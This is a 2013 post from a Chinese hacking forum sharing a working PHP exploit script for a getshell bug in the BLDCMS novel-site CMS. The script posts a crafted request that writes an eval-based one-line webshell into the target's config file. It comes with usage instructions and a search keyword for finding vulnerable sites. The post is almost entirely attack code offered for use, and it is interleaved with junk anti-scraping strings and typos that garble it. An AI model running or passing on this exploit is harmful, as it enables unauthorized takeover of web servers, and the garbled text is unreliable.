找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2176|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞6 Q) z6 F$ w; }; _1 |! r* D+ d
( q7 N) \9 x9 y5 r; Y1 ]
4 `8 X3 V. Z; J$ a# f7 |
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 - e/ o; E' U* e7 a- h/ P9 C

$ K: M) T5 v& I7 b, f) b既然都有人发了 我就把我之前写好的EXP放出来吧
- b/ U% ^0 E" A  M9 o9 ~, [ ! ?2 c$ a; m, E/ T1 l- g
view source print?01.php;">
) P. S3 k+ H$ |; y) y7 \) K02.<!--?php# K! j4 x! l& F1 Q2 c
03.echo "-------------------------------------------------------------------
1 q! u6 i$ F/ Q6 n3 K& x# `04. , x3 c& I: _+ g4 E: i
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP* Y- p, x$ `, i, g# m5 z
06.
' L& _' }1 _) O. o07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun" ^) m7 X. j3 U, H2 v3 Q% V
08.
+ q9 N! m5 l/ G/ f* Q% N& P09.QQ:981009941\r\n                                2013.3.21\r\n             2 @& U: a# U* ^. t
10. ' z$ D& k" S* ?/ R# j
11.
! }2 b0 W! Q+ \8 q' I% E( T( U12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码! x; @, ~% f) g, V
13.
' ^, {: x/ q3 F14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------+ C: l+ U0 o1 ]& R0 ~$ H% C* V) ~, o4 R
15. , H$ ?1 b+ [; T' ~
16.--------------------------------------------------------------------\r\n";2 P" ]" g. h  a( _( ?6 x. n. ?
17.$url=$argv[1];/ M+ `1 R5 I+ h0 \/ Y% f
18.$dir=$argv[2];# a' p7 @- I* _! [% ~* j
19.$pass=$argv[3];) n5 p6 f- e! o" [% b; k
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
1 I4 L4 O; b4 d21.if (emptyempty($pass)||emptyempty($url))2 W9 e( l2 [0 k% }; [
22.{exit("请输入参数");}
. T1 g" H8 h1 D8 `- T* c23.else
$ `0 s) h  b8 C24.{
! V8 x/ q6 o% }9 N5 \; U25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev0 v" s3 a1 X& g3 |
26.
; S9 i' E+ M# b! S& _; U27.al;
( T+ u8 G. b! k5 G28.$length = strlen($fuckdata);
, B) {* [; u( S, s6 I0 s: L29.function getshell($url,$pass)
6 j# R: h7 t" u: I3 j* E30.{
2 _) I& q# `- J31.global $url,$dir,$pass,$eval,$length,$fuckdata;; V+ m" o" n% ~* H! a6 ^
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";1 r( h  B& t4 V
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";5 t! O1 c! Y. [2 V6 f
34.$header .= "User-Agent: MSIE\r\n";  Y/ ?6 H' h9 [/ [4 W
35.$header .= "Host:".$url."\r\n";$ R- o8 w$ p8 I+ H) z1 Y; E' g
36.$header .= "Content-Length: ".$length."\r\n";
1 w: d4 k2 X) v  e1 I6 o# g37.$header .= "Connection: Close\r\n";
2 ^# M& W( L5 a0 ?- O38.$header .="\r\n";1 y4 k5 R% L' k/ l$ X
39.$header .= $fuckdata."\r\n\r\n";: y, v6 p% a# ~8 j
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
* I7 M# V( @5 z5 X  A/ O41.if (!$fp)
( s/ `. |9 M$ o  a" D( K42.{! d/ T5 f7 W" X- \: l9 e0 ~
43.exit ("利用失败:请检查指定目标是否能正常打开");9 i6 s! U3 |" [
44.}
+ f5 z1 k" R% Y% O3 M; k, S& ?" t45.else{ if (!fputs($fp,$header))9 G) w$ M* K4 O
46.{exit ("利用失败");}
- g! e# e6 d2 k47.else  j) X% F* |* i( O
48.{
- H7 Y* n6 Q% @0 W- W1 {5 v" m1 b$ T" c49.$receive = '';
: U) t* {. s! R0 P* F$ d* F' t3 F8 p50.while (!feof($fp)) {
6 ~) x" ^4 U1 q8 s51.$receive .= @fgets($fp, 1000);
$ ~1 y# e' s4 J1 ~; X52.}
7 ]! z2 j, x  B/ e53.@fclose($fp);
5 n2 C; j5 t( C: N$ M0 N54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
& z' G! V% U9 A6 n  r8 h+ `55. + Y; n: c. I9 @6 f( {9 A
56.GPC是否=off)";) a6 q- Z& f; t* X# s
57.}}+ g1 x& |  K6 h
58.}
) D: @6 B! Y# o% s59.}, T; K! a2 _. k
60.getshell($url,$pass);) A: m  p8 Z* G
61.?-->) X/ G, V. k5 g5 V

) d* G6 W! H4 x0 T; |# c
4 c; Z' T$ D( s% Q, i
& L5 M) L1 D( h7 [) `: o0 Y- Mby 数据流
0 s  d' e* e+ a* n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表